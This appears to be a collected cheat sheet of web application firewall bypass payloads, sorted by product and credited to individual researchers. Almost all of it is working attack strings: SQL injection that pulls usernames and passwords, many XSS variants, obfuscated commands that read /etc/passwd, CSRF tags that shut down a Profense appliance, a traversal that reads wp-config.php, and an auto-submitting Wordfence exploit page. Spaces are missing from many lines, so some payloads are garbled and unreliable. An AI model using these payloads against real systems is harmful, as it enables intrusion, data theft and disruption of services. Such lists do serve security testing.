1 AND (selectDCount(last(username)&after=1&after=1)fromuserswhereusername='ad1min')
SQLi Bypassby@Ahmad Maulana(v2.2)
1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-
SQLi Bypassby@Travis Lee(v2.2)
amUserId=1 unionselectusername,password,3,4fromusers
SQLi Bypassby@Roberto Salgado(v2.2)
%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201
SQLi Bypassby@Georgi Geshev(v2.2)
1%0bAND(SELECT%0b1%20FROM%20mysql.x)
SQLi Bypassby@SQLMap Devs(v2.2)
%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29
SQLi Bypassby@HackPlayers(v2.2)
%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201
Imperva
Imperva SecureSphere 13 - Remote Command Executionby@rsp3ar
XSS Bypass by@David Y
<svg onload\r\n=$.globalEval("al"+"ert()");>
XSS Bypass by@Emad Shanab
<svg/onload=self[`aler`%2b`t`]`1`>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
XSS Bypass by@WAFNinja
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
XSS Bypass by@i_bo0om
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=qonerror='new Function`al\ert\`1\``'>
XSS Bypass by@c0d3g33k
<objectdata='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
SQLi Bypass by@DRK1WI
15 and '1'=(SELECT'1'FROMdual)and'0having'='0having'
SQLi by@Giuseppe D’Amore
stringindatasetchoosen%%' and 1 = any (select1fromSECURE.CONF_SECURE_MEMBERSwhereFULL_NAMElike'%%dministrator'andrownum<=1andPASSWORDlike'0%')and'1%%'='1
Imperva SecureSphere <= v13 - Privilege Escalationby@0x09AL
Kona SiteDefender
HTML Injectionby@sp1d3rs
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
XSS Bypassby@Jonathan Bouman
<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"
XSS Bypassby@zseano
?"></script><base%20c%3D=href%3Dhttps:\mysite>
XSS Bypass by@0xInfection
<abc/onmouseenter=confirm%60%60>
XSS Bypassby@sp1d3rs
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
XSS Bypassby@Frans Rosén
<style>@keyframesa{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
XSS Bypassby@Ishaq Mohammed
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
Profense
GET Type CSRF Attackby@Michael Brooks(>= v.2.6.2)
Turn off Proface Machine
<imgsrc=https://host:2000/ajax.html?action=shutdown>
Add a proxy
<imgsrc=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>
XSS Bypass by@Michael Brooks(>= v.2.6.2)
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>
XSS Bypassby@EnableSecurity(>= v2.4)
%3CEvil%20script%20goes%20here%3E=%0AByPass
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
QuickDefense
XSS Bypass by@WAFNinja
?<inputtype="search"onsearch="aler\u0074(1)">
<detailsontoggle=alert(1)>
Sucuri
Smuggling RCE Payloadsby@theMiddle
/???/??t+/???/??ss??
Obfuscating RCE Payloadsby@theMiddle
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd
XSS Bypassby@Luka
"><input/onauxclick="[1].map(prompt)">
XSS Bypassby@Brute Logic
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
<inputtype=hidden name=avalue="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
<inputtype=submit></form>
URLScan
Directory Traversalby@ZeQ3uL(<= v3.1) (Only on ASP.NET)
http://host.com/test.asp?file=.%./bla.txt
WebARX
Cross Site Scripting by@0xInfection
<a69/onauxclick=open()>rightclickhere
WebKnight
Cross Site Scripting by@WAFNinja
<isindexaction=j	a	vas	c	r	ipt:alert(1)type=image>
<marquee/onstart=confirm(2)>
<detailsontoggle=alert(1)>
<divcontextmenu="xss">Right-Click Here<menuid="xss"onshow="alert(1)">
<imgsrc=xonwheel=prompt(1)>
SQLi by@WAFNinja
0union(select1,username,password from(users))
0union(select1,@@hostname,@@datadir)
XSS Bypass by@Aatif Khan(v4.1)
<detailsontoggle=alert(1)>
<divcontextmenu="xss">Right-Click Here<menuid="xss"onshow="alert(1)">
SQLi Bypassby@ZeQ3uL
10a%nd1=0/(se%lect top1ta%ble_name fr%ominfo%rmation_schema.tables)
Wordfence
XSS Bypass by@brute Logic
<ahref=javascript:alert(1)>
XSS Bypass by@0xInfection
<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>click
HTML Injectionby@Voxel
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
XSS Exploitby@MustLive(>= v3.3.5)
<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<bodyonLoad="document.hack.submit()">
<formname="hack"action="http://site/?_wfsf=unlockEmail"method="post">
<inputtype="hidden"name="email"
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>
Other XSS Bypasses
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Apache Generic
Writing method type in lowercase by@i_bo0om
get/login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0(compatible; MSIE5.01; Windows NT)
IIS Generic
Tabs before method by@i_bo0om
GET/login.phpHTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)